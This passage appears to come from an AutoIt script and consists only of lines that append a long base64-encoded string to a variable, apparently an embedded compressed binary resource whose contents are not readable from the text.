	$bdata &= "gCot2ydEocGcnF0m3H7+kgIgX7QpuH5M30M/AkhPtJEMMV9IA5JKL5DgwZIvkkotgkLeL5JKQvMAPypKRBifU1wPoLtpLJtNEJFcwSy6SS1BgkksuknyQqC6SSy7A1PCSE8lJRQDUIOSSi+QsUFiL5JKLgIQDi+SSsLCTHCSnp0Xc1UZuD9CECO8CR0eXQK5dtEtU73BXgJdMMkCgrCSXXCTQ2E0n703WHw4LEzfsyUU7RwR3QEgBh8lIZeRTAlsEQJF8ixa334TFSHdywMtnArC3SL7JRNdX5FgkJ7lQSBBoJ5kJP9dIPL850S650HBX2AAuuUgunDDISC65SGD0XCQnuZBJIMCXXCSXTPB4kktOJNkgpDLS3S5QD1u/AtBFO8lFoEoEV+REcsnQMNoAueQiuVwwiCK55CJgtMIiueSQ4AKEkKn/S/+cEtsppdSPz9r4k4mKh0tUx9tccpF8V4hQtJFccpGA4LlITnKwTAzglpxILjjc"
	$bdata &= "EJuEECH/N7g9kp/sAr/lTJCfQPYI+Uk33EhMtGdDHhDhoN/ccMPtAclM+MbRl6AXLrhITk1E0HfbhpFKW3bmA3CPUPKSid1NrNhOycvYzixN2J+7vUJuj91N/Gfoz07JyxDQ0HJOQJ1CTk5weE5kIwcEumdQT93dMtHwkKhOqNfdtZEj3w7YAeMC7u81MNGIL95/0U4yMt7eTyB3IeQVYE9PXFwUjHRHCawXkCNHzp6YAQ+jAq4DuXLkyJEExwXVBuMHJCMvNPEH39+9ZKLrT/Tn31AoIrnkoleAVOAiueSwgOAwHYq8f+gB71CRbXnRd+AgDigBJCPdyDMCPocE6C7a61pnUSxXoI8qhEtYV1GokScXBX/Q2AA8eQeT4GcO8PoFvAZGvuECBgoH4QWTjIzh4VHvg+QlF+FSJJpNUBBvAnd0kbeX52e+VOTunx9w4EFwu7m0z1dQ32An4uTkdsAPytXf5KABp59SuJ/ik1wk3Vf8QFP2A"
	$bdata &= "iySKN/iex+0UzDyhgKRN1NU300kl1zQmOMiGemGDwhnAsSLRXLtML/4B+10nLwOaHB3VCTPIukmF6BXYHIiueTQjOQAXHKRXLgw5KfhdpFgD26XVRDJAxASdwMPG7TbtUdVRK9UJ2SvXHKVXN2crCo5kZy8EJJIjpzk9FYEVhQuOZWcETdWTFwquUhObOAiObnkpLTEOMlVchKO/FcM21bykr9XAT/zPG/2ZAUPfAaYtNDJwDLi7AF35wRip5BtNsNQshhvWMkVu3A3iCs58iJnWBhYMHJylXSHmFx0AFjJBcALIYec/+VbWN+QS24X+Hd/zFOywIXfLlkMviMmrpBUo+dH8gDIWSgDHhtZI5W3klS+xgN4uGB0bVcvF/YOTdEXD+YBJ1kPol3BieYnf+hXi+Rx40rPWhR7VOME1yhj/1pAjy7YbaQGiCdQ523NhuQ3R+YBL4PyKHS7D4xfsH9auG5fyFXMAyoml9RtkByh/1tW95ITyS"
	$bdata &= "Uw5yfrZajjXGfkOXJot9ew549biJ9KfzZSeWcCzlIErGe3ohPtmM9BclcfUzEySGTsVndcbVGJ2UQDD3TnD45HA0KvXBBvMIw2plw3BZzkDNMH8P/nnVywKrp2kcBX3I+vansZ3EilL2ddCFVYGwR/ruMfZ04Q3E5dLFcYF+gTxeTI9iEOGwEjAHduJwpOXWif6FMPXxCB1k5r//8T7Smi/189AD/RnEhOJGBlYRRJTnGRok/on+TaRcNehAfCV7CJ5JKL5dzkIjnJ6QhfCCu55CK5NE5gIrnkInGM5CK55JS4t5zkIrnk2mAQkVxykf08uUguOeogaEMuuUgulGbASC65SInsXCQnuaxhGM+XXCSXRPJwkktOJOsVnC6SSy44yFtJLpJL9H7JJRfJYiChTBfJJRfEeOeSE8klpOwK5JKL5NAt/EVykotQYyjJRXLJc1SWYMlFcoC6ioBTUd9xYZ+OErcHA3IRz+H/ZMK7kEhfegs20j2"
	$bdata &= "q12RArwJQJ0MeEOpg/+0huKQNkmRWRMSq4AGMz4rKX0COnOTwZQBlEF0kJ7mCZUiydLeR7SEOugHCH8qHBEMMFYx0j+BfeSCPZJaMZbjt7VCg2yNl3FfIhwfII3mXDWYY7oLq9pASZjxXKP8tkUxy7kJmVmUlF8klpIjSy1DD0IfEmhtGJjmq/2ZnZ+QnnUhnZJdnfNJCyQPLWIaoEekEcsDJ7GeQHCEe7sb/Z4nkJG1W62gIyUVyye8ONDFyyUVyYFSMRXLJRXe4A6h0yZzkd53kVMenNCdpEGkgoNVEuycwr6iu7InqRd9paF/v2gEP3GYD1eJvBFeMZ3geo04Q1/AFf2nQo24PQGo4dyt/lDxIHmoMakxY0kLIcLZPob0Tlf/wdSEOgDyACKe/apQPtdS4XXuUasiv2CfoTrUHHV+5Da9rIMCl20lrMCdANwcgD3nw2Wt4woC8PJKKa6TxBBJuD3nxDGvIZ7Qkhzyg//E8bEVySRtW"
	$bdata &= "YjgRo3DJhWSvPUgWIm7JQ8oYCaguuc+qzM8B8ijCy/S/bPhFvDzk8c9tHG0ISA55QP/x/22GCq6d8iJXhG+k3B7Jv4/a6wJtsJ9Fe4T8JN/yTW3UZ4ctxHXAN78eq4ETyG5E8nqfXobgg9Qn4ftH2OITAjlyGl9uLG4Yu0hOcvKdbojAV1xykVy04+BUYDuR8wcPr64HUOJvDA/wmT/V7dqpb0CvUCdg5yOn5ET1S2+Y8+0kJ5BP81pvvGchJ5ilP/OKJoJVpB0nzPKQQV7+pQJwLHY6QnK6B3BQVygIVOI8H3D+t5OcapdwjHCcJ6x8FxMEx/SHDhcB4MAVjP8/Iifkr3JUgQcEBe7/cVwQ3E5xMCdAJ2Oik5ycbnlxeP9EMsmJ9J9xwBWctM7CyjfgPJIHYDcEDghyFDtJg5R/7XI4V+QBBXQk//UdS9ogOXJWXskJLpKgn9f1p+0BjDhyzAdzPIcHyWPEygdzEHMthDySUM3Utu45A"
	$bdata &= "cclbO8caN1OcipzmHOoJ7iSq+Sir7bwciI5cnQAdBAdhzi55FR0SFhoRwmcoKf2Ys90+0KukqDUBCXYP5AT7UQm+n8olS+SIxnQKTd4OZGcaD86FTw25ERyIj1CSZkTBe8jBFw7Bky/YqASJ5JFfL4/FPsIcQR+pwR9u4/k0Qbkf3XYP4FKwYmCi/ZPhDbPcKLgRIV3j4b+s/dAIZ8EiH4PF0onklMED4jQjIBOFJxoP4+bz5WknWg40T+boY+dQgg5xa4XTo+gvu1EwfsEsdkG7Y+zmA/CO8HeWgZkj7RBBkqnkl1rica1IXisQNftJHi8J8xv6d0eybS2Wd/JBtILhneCf7hABkQP+Xf2dD/Z3Y+yCw8HeXwChBrAG4gGpIckt98VnwxfvZk3oIJ3gn0FUpHfvrUGuR8nKt4pvwUGCS/OdZCBnWg/2CC/jLQT7T3aUwZXf9v6P1Unik7dKH/f2g8qTrQT45p/5uvv7YOmDwUwhz8FNQ"
	$bdata &= "+/JAPSBj5QwPA+Ing/7H8FQNgG7yeSLdA/PkevSVXE3kcEPwVTUgZu/4YTyW+/VYRYVj9/Z+8jBZ6XBrNPquAPB3xsA3KikQF0n+YEEL0TBC+rYF+s6Qb9GsIX3H+g/gZWKQgAJPbeEOytoIwGKI0HAAEUVviE1kHpZlPwh4jdtkFj/GlibCB0nAZNTCB7WPovgicgCqgkrYKqCBGpQQQEMhVURY3ZpqBFyYAtv7RlMtYuP0FWbGI7YUpAQC9XKx2IGm0vESGCFdo0N+dq18ZqNyef0koF726TJy5QC3K9CGlGS4UKAFxOP+8I6KHvPyRD1UBVRVjaC2j9Q0xVREVEYlVMRUDJ39YiEGrAQUFVMTIFq4WGQBdVZwoWmBrX94lC1hlQj0RgFWx3R8FJBJyTTD1A4ERq6yuFtq2CL0fnwlRiidtvtwQc7W+fVXJaBlrdXwlBTAJCWgZYcN4ScAQeX31GAPBqj05vTb8JBgTvr03MSUlQHdN"
	$bdata &= "aDIdZ2GcbZc1wPjFAf9MVvI06VUhXTgpfUVVY4bYxm+8hZ5QV2mqn95oVi7JDNHQU8TWgFMXfNS0WSJpGAPcFOpxMH4cGRSllke9zIdgKT08VrgUJjGR6ZbkK0AvWPJJ6iei5+TvW8ChYtmdQc/xpebZWVyC/Ct6mHgroByEWaCHZT4DULlN/gsAUxwIvVaI7aX0P6E9OQD8cmUWtU+uC1VbRMj9nL0AbVadSZ9/XbgpYtce1lWnAMFcrlgo2oj1EQx8nAB2F2G/d4CE1rHZv7+CjBTSCRrdfBPa4LC1SQIViYYsCX0k3YjiSlasXIA0SECc2UMCK/98rKCDQz4cVFBBoR597kAq0R7w/1iGtQGcECpAKF0+CBRYQFmP/3Wq0w61IsNcg0eBs718h0T4hz0ewYiv4ZkN0bFNXGrVcEH9HMKgYyPoHK4qNBj+XtgojU9z3RtagbcoNbA9nQCmqQjpJEGiobalHoXdjqw06sAmv32FVkAif"
	$bdata &= "P7zfqK3VV0kg8AbxlqZR22DwX41P2E0AC4+UBBCoP//OglYsjz5mSGrQh72HwywAiSaW29agl5lH0N4QiRhJRxyQIDplZSdjGLVbE6nWR7faRgAtVz/TSjC9V+/Wwk5YmjA6Af8B/KaV2EfZRF5IBUqYX8g0NbUFmO9tFbaTZLI0O6eQYBcTZVfPAAcuQE9gZx2Etq/pMz+AS5144D/XTqzC4ABrRYYJIWYX6ApPEDgfvgQeg4BKMV/EucQQZm5VRAAQ6N9HjWCrWi1nRbApReRtTzabCm1vU4btRTGvS0t3K4hgFaxXPxbtrdhH94eVtFKBXycOWG9tvzdPUtH7LT9m6AbMf7atCgAXzz+k2G0jsd5HPlmXTn1MUOMEoJ7n7aduPAY0JBQ92+X7WBE2pAMIBm387O/lPck3dgFu6G3cBsQjz/s8uJyyNgXijPJc5XluhHjuJTbkeSrPM2hgVAAHzxycCUAebW4IyvOMPOUUDAD7Tbqpo"
	$bdata &= "dAJb2zoBmlLds/YxKcKDDakXpqV55R8JQTpbGyBfN3zBmBQp7puCwQmNgTPSDhPDDcovTzd8wYcDDcN52v8QB665wb06G+xLhoTG4b3a9wGzC8ON8D3YIM8sBDfa6AG7/LpnpCA3xK1A3RubAM5qDxggb4nJuR93mtUBkQwujYmKDCxIXgY9xPfEAfyTHOWBGo2FGoHQeW94AbQNrQVh2oc7BC8rAaghxYIb4g2IZX3eKZkFlA35JmQ7jCnGCQUgzwTGxs3DAAkbNh7IGn0BuQ3Hd98Q/EeadwGzLceNmoDnsrzrGnAuKzeH5XnuXzmBJyUhKL3YFpazo9peAY8ExumaI8CN1xM5420gwQI3qhEBjQz0nSfJAiGNwS2AEDiemRo7GjQiAdFuBYkGrkntSoYSBW3g7LRd24DOdoFa7E3ubQ11uiXeKkH7DoOV4ZwcD0/CKASCr9TaW1wWGuLAP0/hQZ0q48vWIcasKpsp9dD6rK1JxeCRK"
	$bdata &= "dGf2cg0amDPxffChmATz9PdLwIuIR8/yPwZChAHi+YITeGAmS0JZ+JQxcWB3UcVLAeg8kbhP9GW4M9B/Bhb/8xrVGUD9irxI0zPU1nF54ygkDadGw3qlAA/KJ3X0FGWB12Abi1Pz2zS1FbiI1PQcogA4s/jGVIyGFicUZbGdpNRE9TW9eTWZE/bXwqWGuWZ0GfQkFTRVrYOhUbAAGvdnCeZ3sEDndwPLycbaMgNx4cAQ8kApEjR44wBDwIVCCE/EataDEfrBD3QFHv+IAPYQ6wZPYUzKEB/xUoFhXXaO/wIDVr59dTdg5cJA7Jt+d5XvN47HcGdnV0nud5nnNycXBvbnme53ltbGtqaU5wnudoZ2YPfCzzPM/zBkBccICUZ/M8z7TE2Oh9BJ7neZ4sQFyAlKzkdOB5xNzXVljWViGQXz9qeFewX0s3YFgBwCJvZQL/sEdIVE1MywOraAB3VwSu1kBPKRlpwirfMy1mHbh0eHlJNkB2K62"
	$bdata &= "Y8DLFC7cwOhXoV/dNRsFQNGJPF7nnx0ZLsE23sVJ7fRLpb2908pdTMmxDAD4B81tMoeCUbIH3g5AguEp7zxW+CQ3G9S8LRbRSB3+2YtVGR2c/xCZagRdKLcEiVzEvy1pbDf8/MDQiMfc3Qw0LAsiFzG+0NctK56+owiwrp+dNChQsxyVoIWogP0pWUgpHASdeTXpglNLOAEFCB6N0ykp3s9iC1IhXS89vKQMnVzQkFwwPkB5GwkCnUjVgLuM8/xstVbK/3yZZC0q9mYeOMVomh2+xrJKL4bKfUKlNLRZfzqBKbG0VrzEvHSB9m8Ju9PIgr7BDro8UBCHlJCsgDwgONBagEMK/tzNJ3tsGgAcBvlCtEGDJJGvGinJ0OwG8DRaOQm+wnU0t2L98NhQoB1Rfac8WcQgvzLEiKzHsGb9ErXXKc5h6tEWEvwHgP887OxHWt5VABjw4PM/zPDQwLCggeTbP8xgQBJT48Od5nufk4NzY1LzneZ7Q"
	$bdata &= "zMjEwF688zzP87i0rKCY53neyZCIBoB4bJ7neZ5kWExIRDgDeOl5JBg+gOHCUVfPPxY2sE2lzwMPyjMYefYYDc1sCe3k5HkODAgJCjdut27JC68NDw+vECfd5N0nEQYSLyE13U5Obh9BQ1BnUtvtdrsvUw9Xv1n3bC/keZ6DbVYgcBxy7XbB7QZfgGeBD4I/z3PByYOEH5Epnk5uJyehpN+nt4Yntws/zj/XGAdmGBnQkgxy27VE65E3AQM35cjZlwKasAgPhAlYCo4cOfKZwBCUEWQSQBPIkS9HFBiY3Bm0Gnw5cuR8G0QcHB6X/B+XL0eOmCBgIZZoIpVy5OzIyHi0eR+kepT8YAQY+WgA/4RvwVbSJM4BL3a2EFs/X59goFqiARBYBWsVL7ZfZUAEKRRVjvcbLXF3N4eb0AYIuotdVggbdQ8B0YuGKRkQAhcHUbFdFwEByYVcJAIDUQRWpLcImQjY2AEQJEfI5QAgAERtaADZEbGhb"
	$bdata &= "D8ZdaSAorMHC6AjVBUWQAUZ9ggECLO3PxAOYIJ5giEtpt8PoWC58pGlgZ/g/EB+gDtE8UemwaPao5mB/g/kAnYyQLVfQVPI/++2vs+i5KIaAOWi6KJbfiXffr+hE1EFBtpe2r5f2mraMhmfbD/T2N7g+XIxfgbiDKIo4SndhwQTQcb8HyViFQwBV7M9apze7+AIBuSQ4t5baOYQFn6wXw42gH3M108FYo8HAcn6FLDdGCZKd5//1whhbbnrfAgHAAQMX/6PmWn0E//cp9e5hWZxsX+zhTY7IhL3NkMMmBn2gDSUwpX9MwPZ3C74Ed0UBgUpkRttRIbb5nIq0Z1wDyW3WFqKTVBTVHtRxQdQRFTP3nAGQGEs0LBH75N3sn3wfwUawAsdFgSSk+eSlo0IjksuueSPkJFMuuSSkpMDj3neycF4NgoeLjta+TzPO5cGtdTzEQG8aZ+nME5tAWc6BlnzPM/zd5a00/JLjp7mEAEvTVBsoUhjWm"
	$bdata &= "Y/QZjoR1fiCi6HLLQNtWLaUAd/AXDvOWfnvXfNCASK1uOje7sNIXCiiKtfN25D1KUB7n9DDzt2RegWR4v+2s/zPO8FaiQGKi81OkA8z/M8RkxSbnPzPM/ziY6qus7neTbP3v5rAx0inud5nkJWboKip2ye53nBxub6bBLzPM/zJkZLZWrP8zzPip62yurvnud5Nm0JDi5CWnme53lujpOtsvNsnufS5v5uEjLP8zzPN1FWdoqiWkwpRX+vGWp1y5f9plGvTxb8Si4LOvQum0D/A4FiGB4IvJukaSB/FA8G58gdlyNHjswavBvAH+h2duTIYBNYIVAOP7QNDzs7O3KsD5wQP0gFD0AeL44cOTuAEg98IHgMlAsjZ2dHjBVfOBwfhBkw5MiRsxEPKBggFhgXnB05chAiDCMIJI8EJc7wzo78Jg/wlBFXEEREgQ6Ldz0wr5CTPPagAkAXyAX6CPmQD/lAnAxQww8k9BJHPsgHgJaYFiC8vhk"
	$bdata &= "Ev///v/LJG440oe3MzhvC005AIPCetXArqK3FnWlA0P////9d/SXlGo5PGeuDQHGW15VDDgWNKa+eQPm/oETtgRKPgf//9v+CuUC/PNWmz/9JH3h4QG/G4IzpgMlHupOoQbyFa/////9VJzmN93DgfEK83Y7e+Z37636qUUOh5nbjzPIpL4SBJv////9EKBAXqviuEOPFxPpE66fU8/fr4Up6lc9FZczHkQ6mrv////+gGeOjRg1lFwx1gYZ1dslITVhC5KeTOTs1uLLtU02n5f////9dPcVdO/8/i56SWv9dpvChIMBUpYw3YdH9i1qL2CVdifnbAv///2eqlfjzJ7+iyF3dgG5MyZuXIIoCUmDEJfvPbE/vzcwCAfs/cT0K16NwCf+/6b/4P1pkO99PjZcMg/U/w9MsZRniWBe30fH6v+v/P9API4RHG0esxadeQKa2aWyvBb03huv//1eJbrxCeuXVlL/W5z/C/f3OYYQRd8z/////"
	$bdata &= "q+Q/L0xb4U3EvpSV5sk/ksRTO3VEzRS+mq8/3me6lDn/////Ra0esc+UPyQjxuK8ujsxYYt6P2FVWcF+sVN8ErtfP9c7Rdn/7i+NBr6ShRX7REbSOaX/////J+p/qCo/fayh5LxkfEbQ3VU+Y3sGzCNUd4P/kYE9kfqS/v//Ohl6YyVDMcCsPCGJ0TiCR5e4AP3XO9z//7+Tjhux6OOGpgM7xoRFQge2mXU32y46M3H/////HNIj2zLuSZBaOaaHvsBX2qWCpqK1MuJoshGnUp9EWbf/////ECwlSeQtNjRPU67OayWPWQSkwN7Cffvoxh6e54haV5H/2///PL9QgyIYTktlYv2Dj68GlH0RWt6fztLIBN2m2AqPksARno+rIGQrcAN3nDKwVe5fF8FxSs/2BaxUBq82FS9UYxBUmwIJVFCItgigAwTQPAoCACiHgGsmf0ABAoEtN4AVBQfP8zwTODBwYOCV5tM8wBEZgB/8CbiFPMAvI"
	$bdata &= "Bhpmq4eHBAHI6d2lgH+BweD/wJP82maBwb+zg7EwGw+m80eAx8BAYDAf+A/DOY50vAA4AAQr22awC5uTvjB/F7DlMd8OKR9Bs//AUZnEJtCXvIggAAHOGk22+YE+ITIDslIqXiSw7O974MegGQG0h6BKTl0W5rNZoUBiIKQfKAG332aZ/h/B3gwh/YGAYdN8jwPWAcDIQL4abbPLYYPgwYf/z8PABTZdqmgz+8EgAYIQO0Ztm8XA63ytALggBvJ9p4ECPAQThAgAXxDyUD//Ab4f8GOb9nwPxf8NQNsNpstTgADgAfAD+AfKAi0kQFiCERhqWBnAQZwcFAaFgInN811cHBHV2cBmU9Fw51LBxYmZzg4jCl3Bxc4ODg4JzdHV51L7Tln+08HFhDyEcMmZwoADs9z8kwDAgICYnvubbYItJIECgIHFyc2qOPjvUdX18/PDcOR1/xn/Py5d/M8nAz+BAEHF6mO9+4nNkdX14ocIoYVZwGAsj"
	$bdata &= "3vu0cGEIDIjJIGgKEfbvsuFicQR1ZnAaofqZKAd39Hstl83gbgwHOAYQBAx3b7LhYn4Ef4Z8Yi5IGqNwwAEnvP5psYBiQMQhQkFkQm8zzP1YRmBAQEBKhW7cgEP/ypN/dsvivnBsPzgePDFnmep72DJgMG/vz48Lhqk+fgwAEU2w6BYmdpMCQGKELzvvc0JCIWISYggAZABDE8zyAQCGd8mm2Hac/DBseBw8HDeZ7n2cDnfz8fD/IRiOEHZ84LfHRIEQcgnhA8PHacBL/P3jA6enzv/g8eMCSC4cRnD2PHycfgrvD8z6Ojx8fe7/4PHshXHUcvzxMACu+Fb0UAf/imBhABwvM8IECAPs1m+xlCMAZESEiEUGBIfCtAPs4wBoAHPM/znA8fP3//n2az2YHPg4eHA4+fh5jqwhN61w9ekTxgZ4AAMAx/e7PZmlAKkAkQCIACBkAEEYggCBLOOaf8SBAQFCgIFyc3R6dquHdWZ3Znz/PfbN5"
	$bdata &= "sBo/xD/D//n/8P/gOcB9zzin/8AwwD+AIEAcXJzdHIxrunVZndmdViREczwfu3r1bRldmd4aWQYkQJVcH7tzbQk9nd4aWEcMQJVcPZ9lhBgiX/s5AAtzNZrNAAkGCQkJEIggHcM455xcnN0dXZh3mUsBnB57OP91sNpv8P/w+fDw8OBwH55xzzgcXJzdHV2ehkquGZxABkKtoAf9VmVPV7/dHDnAmH2qXqs4HFidmAaoU0LBnR0JHaIFHdwQ1rKonZ2VO1W4Bv/1HPnz3VjlXJh8HFydHAEOHEQxnX5BMavgRy1pB4KVhSRAUbf8BSaIqIGIQiAmwiAgi87GAIAhf7a2WGE0dAR2x1FJLEYmVAUu0LRfXQbhAbAsXjy5YghYiSdGzhgAEAVXhwRZoq8VZeQBBLBUBtE2jqhNNHQYUYBuJX4AQsMWbQTcqSEFfkQAWIrZqubNHwKptiU3FVYWgIl/NAVJUGL9lBkWARF9wAQkKx6FgFQES"
	$bdata &= "d60KEjXNtQgwCrYXxV8wYoGgHbU1jQpfmwucWNW2+0GHEQOqVK/DAhaiv33nYCOCVa8vIAgCpF/Q/v9/9fX75OT019fv09Pt3d3x7u74/Pz9g0RBAUZfRIDzrANf//9aALa6uuN3d8lLS7hERLWq2K7/X1/AkJDTx8fp54MKjapU7RdaiACDZXeCFbC3+0HHbVHVouV9JBKFQlgA4tACLx///6+P8fH51FBQuoiI0rKy4ays25aW1VvVvv7XW7/yoaHa4ODy4YOB/F85T0+vr96urt2Xl9ZcXDCg01pXRYBVB5lfLcW1aU2ZQQGrglTHgghIFC+VTECqNrPfBImKQIN5UAAsBAH/Ahjx+Pj8Cjq+c3PIsLDgs/8CtNez4toK4XDfmJjUNjawjUftpdCN0rjgg3WV/P/5dcqvr9+xseC1teO2tuOZmdUqWhBiS6uAVaGwn1twaFVfT0HCqiBVx+oSRl0fJdxAqhazwxjBjBFJAGAhIHkB+"
	$bdata &= "p16pYbWcnLHWlq/fF2A69TiBFjgra3m49j/nwJ236Oj2Tg4sZWV1ejo9YMR7fwBrKzfsLDijt4zkGi/0LS046am24NBFahoEaUogGnZty9FQdTAMde/Qq/UUoaGz0FBtaqqyJ3W1drjBOIQ3+bgBN9qCnV14OHs36BAtF4xIxTcjoOoqFeA1v5q4qmp3grhjuFq4wSYVqxpiN7gg1kiwGILNV+CCJAqd12/EAHgm5vXLi6tnuAAe73rp6fh4OGrq+PsBP8RCXBS5HHpcXHHg4PA+yH2zurq9oOent2mpojgd4AHKF7h9eRxoIDszQDvCt5ycsiDWFAABfeI/5cabIw4OLCSktilpXUN0N4u5aSk3xDfcPLfy4gB2gQQ33BkJpYJ+OycnNl4BoM7P48slJTao6PfZKYN0FriKOWa4voW4AU4gBJg6OSg26AAAmSDXzVwAzFQvb3leM7bC3CBgdI05qGh4QTgo6Phr1fT1Rzj2uTj8uzQP4"
	$bdata &= "ARZHCgoN1kZMKffbKm9IN/f9A6duOiAtwAs6J95HZ87qiEEefipaW4VOIBBMgGXoNf/3cqFYjJyelhYcFnZ8Sdnbre9a7hkuGkpOfm4Z+f4MLla4Sdv+ykpOMKQOQQCKFgROHiUCNjRhiYoINp4ARo2mnGcOTi3Aq0doAbampe5GTmdua1ArwDcSLf7uODCglUsAEMEzCKQr1LSTj+qoC7nJzkuZqud9rmm5vh1OTn85oRXV285c7m6CLi3QD/6wTsfn7OVVW8QHbWFOCBg1FRvFLn547aDVCA4srn9ASI42vKH+CC+qKi4qammuOCVRVgSM8B/1/EQgXg4PKLi9E5ObKZmde7zpvk452d5rznnp7k7Gie+bIQ1OUi4+BCrDcFFuLgMzOvTmn/Yk4ig5qa5ZiY4ojiPRvg2UyU4/RqcOPbEgbYggoMZijfMiKAANkyroNZLkENLDy0y3S1/y8vrZCQ3paW4wTi5uaAB2jtwugQ5ATjceU"
	$bdata &= "o/PVcfOafn+HsSkq5j2QuSFwqgzAwrgADnP+Rkd+Xl+Sbm+dwDXCt3fSCduci4gR2CDD52nwK4oJLS1kvxCICvLKy4Dvw5Wr/O7KHh9qTk+QE4+DU6dYIawpk5+QWQOgKWwFeX9rl7F7oHOR6u9BFxnrOas3N64+Dnv1cOTw8l5folJTjdnzlDCNMAWTm3COaA4igaujk6DiUfQBwfHzQgxPVQCICnMG3puv/weZRUbp1dc+VlerU5uYK5ZaWZwO0rufy5yLldgQcH7LmX+DlnJzn5hYSr579Y8uv34N2dtCSkud8cOmEPbvWEOR25nyUcOhkaQMcoUjiajri20Zsrd2DAbD76LpQrNt/2fDw1+/v4PLyVvn8/c2ldr9LcJrk9PSUm/AQsI81zevrBdDs7JpSIX1y6vb2qP/XIQDDgIEGDHeBMxAcgQru7u58iEagrEypd47ZCPvdXCi4YQWJYAXrg8VwoWkuaRhDCIgGJCelwAWtWH1D"
	$bdata &= "jd9xUdACaGjDXV3C193uItqRkegE54+PENSAa4DX6Oxw/kYY8Tpk6PLiatcW+l/sRka3iIjQjoNf0wb4+V/EkJDnjo7kanDodW73PRzjieQEmueWlqKU1oqW6IOrx///NrS95eV7y8tRurpLuLhtxcWr3t5+o8cqjj0M1Nzo/v+p3d1yx8dNublJt7drxMSaLJqq9v9/TrTh4XTIyEa2tjSvry2srAUjOv1/MK2tOrGxWL29kNPTxA86/Sli11W8vI3S0voh8jVs74FPubnDCFLDAoElMltMd78Ed8nJHCizcAa0uLt8iJQiAhru3HS4xIGA3f9FUq/f32TCwjiwsLIFYDAYrGBseGMwGNyEypauuhz+14DrvMfp6YbPz9oV0eN/imbDw6Pa2rQnO/sBbmRSptzcaIiUoLiBu6Yg0LjEIXDFjwjZ2fB+NkhIucDzuwpY5trri4vkjIzqZYQRJ2QcykzIiNfr5sjURgspiVe+6XV1zryPr"
	$bdata &= "bXzsYNJSboE6HzlCuUGuLNrduiCao52yr9WiQF2VOea4wRzc81HihFjg7Ns4fj/o1xxzM2Q5OWO4uN/1NVHfm8Qwek8Rs2UyX/HjxwMAjqysnkkkOHikeLihEejk+jX100gBERQUjPBt/+7u3vR0ZDf4JLQk+Pkl+dg6Ao/a373lubnF+PkluXml5M6EJXk5ffc2jscmASUEJXj5JZe1XN7ZzQcEJUKmebnj8B3CRN+V76+ecrKgMHWCt5v/lC6uoDU1JOX4+Oa5uYKlh6dP7+z1sqcZJp2EAqX4eKb5eY/e9aam5mOnigKnUAcnOXmn9baKUAinxCdHJ/g4dlPqqaUrF2c7tPt7dcraHqyurIKebiWDJwWuMRwdYjV1jChgRb6C/4GCi5/0dKaJJ/k5H3P0Ejf3mJnfChNcEYuitbWnOACLBT/4Jnd3njOzlY6RlkFrathU4CDsJ00paKj7Z21Z4gEouKgLhAKpiiinT1rBcalWKEWEK"
	$bdata &= "M0CoLW8OwWpy4EpYCh9KeQs3eCgqSipsAEHKIECrT2Dn/fmdvbWsDAgMRfEKVApHbPvBXSqVKl4eKoFqNwmseseXsEpfSk39+pqsoFp/astWvKqO4upjqqNAqrKL+1u7upXvQEKBar+p/b3IbS0gvaARYuNLIoWax4yzgqWsPLoQKmuI1SSOtrL/hDpMPn52AMacTEoVKp+noZcEOTpEG1taLyswaEYvsGkrh8Gxhg+5XW16zoov8/23HGxDBBwIjL5On6f9NkkjQ0sIeH4omJ5oqK59roWrqapujr6fLkvxGP+Mjp6WSOjt81Na8tu5BYVI+DIrCX3bVrWOd8OuuCFoN8ACVmZwoWBeZmrxBbbHaDAYyfqKkLMHPWizgEj+nBBMef6oje31eW2lg9RhCdzGwEgmb6DE6g/uYKkBGmdrrykJp+9Nd+JYLcosZ91dWUIpE6XG/3TAoKkEYQlOjpkxTAFY38BJHl5o+2k3bamaI2OliS8pA"
	$bdata &= "EHOZzXJr2FpEQlJOV5BYmuNq7BBaSBEQajBW9kQluRNZ/SpcByzfArMoK4uMJcAbcDBAGEPU7AwywmvoMGBAidgrQgBKappm4AGfPtJnQmAqWuBDcy/Se75zo6ARM6LDWAAa8MoGqDAQoeObumgSQDFaCDrADG4EpOo0Eb3fXZJtA1soEi9fXR2YD3F3iNFVYZPSzgqqmkqaazKAAnjQKK8CH93fMzMTJgYDcoS6A4AlOnxIEnSQnqOo69J2qnKiiAATgmYJ3FgShEqEEorWsPTPM0BCg6KIpEJ6ePTutWJ9GoxYKpGoipBjhwMEQgNziwBlwBhgEAAQABgxwHkY2rgGZ3VjuFh02oRABCWDXKKOUBPsD3MyGB6ayBaOy6ISrYGa4BaYYhewKsP2lfmh6zc0c4qncpouPhnaOlzhW63wBDBC0gTRz2DD6sPjPgAwEndvbNrCwvu8DgZiNTXCdvGAmaLiqEgWtKnPJyYMAlbVQZHYLun7D"
	$bdata &= "VabKMTGuhYXh1Ov81YjfCuaGhuaIiEbr8oqK5uI1gOu2as7hqxQyTL5CkuhCQrafPUpCYp2DMjKuhHBu7c6E4ARY7Grqi4s7e9YOLuqU6RZ86xAKIoG2doD65oMBWqCGECAaCuaHhDe7LWiK6aDr64gWsOlAtbUHWhXBAgGFR0cXHpB4Z8aJGHu/AlGKLKDqCpDq6wSMItEzQg0OxAqLLDJg1QAei6IwFQgG6D6NcETu6iYoatsEIumSCow+jgAFGEDUXhaQOo2e9LPtAwbuAZJqkecopt6ZEjMjkioQCgR1YDA6iQLcCKgZYO3uGJF80ASSagbXGmDACjAAlQqUXjbAbWesBBbolu4WCvfOrgEBli4WCpcEhHXCEv0OmHCZQj/rLJWUHIDV1aDXPXFVD4CTJJVARZlDGBpgCgBBgT4BGt6oZm/Gxmg4mKDPgFO1rJU8BAwEZ1bc3d3HxzRATFhkbraZOOEAA0g9CGmGswYGl1jEgZXAA"
